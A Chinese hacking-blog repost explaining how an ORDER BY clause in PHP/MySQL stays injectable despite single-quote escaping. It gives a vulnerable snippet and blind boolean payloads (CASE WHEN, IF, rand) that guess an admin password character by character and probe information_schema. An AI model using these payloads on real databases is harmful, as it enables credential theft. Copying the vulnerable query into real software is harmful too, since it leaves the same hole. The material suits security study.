记录黑客技术中优秀的内容, 传播黑客文化,分享黑客技术精华

过滤单引证明过滤单引号的ORDER BY可以注入

2013-05-10 20:10
已知:代码如下,有注入无悬念。

<php
$sortColumn = mysqli_real_escape_string($_GET['sort_column']);
$query ="SELECT * from cr0_3 WHERE active = true ORDER BY $sortColumn DESC";
?>

推理:

1.可以测试通过手段判断cr0_3的字段数量。不知道怎么做,就不要往下看了。

2.这个地方sort_column允许你进行boolean判断。可以推理出:

(CASE WHEN (SELECT ASCII(SUBSTRING(password, 1, 1)) FROM users where username = 0x61646D696E) = 65 THEN date ELSE title END)这个可以进行判断猜测字符串。0x61646D696E值其实就是select hex('admin')。为了规避单引号。

3.还可以推理出以下判断语句:

if(true,id,price)

if(false,id,price)

(select case when (true) then id else price end)

if((selectchar(substring(table_name,1,1)) from information_schema.tables limit 1)<=128),id,price)

注意,以上id,price不要换成1,2之类的。没有效果的。不信自己试。那么要知道id,price不是比较麻烦?

好。牛逼的思路来了。

4.可以推理出:

rand(true)

rand(false)

rand((selectchar(substring(table_name,1,1)) from information_schema.tables limit 1)<=128))

 

得知:

该题目可以成功注入,过滤单引号,很多情况下是没什么用滴。

有些思路,真他妈的有意思

知识来源: www.2cto.com/Article/201305/209711.html

阅读:82138 | 评论:0 | 标签:注入

想收藏或者和大家分享这篇好文章→复制链接地址

“过滤单引证明过滤单引号的ORDER BY可以注入”共有0条留言

发表评论

姓名:

邮箱:

网址:

验证码:

公告

关注公众号hackdig,学习最新黑客技术

推广

工具

标签云

本页关键词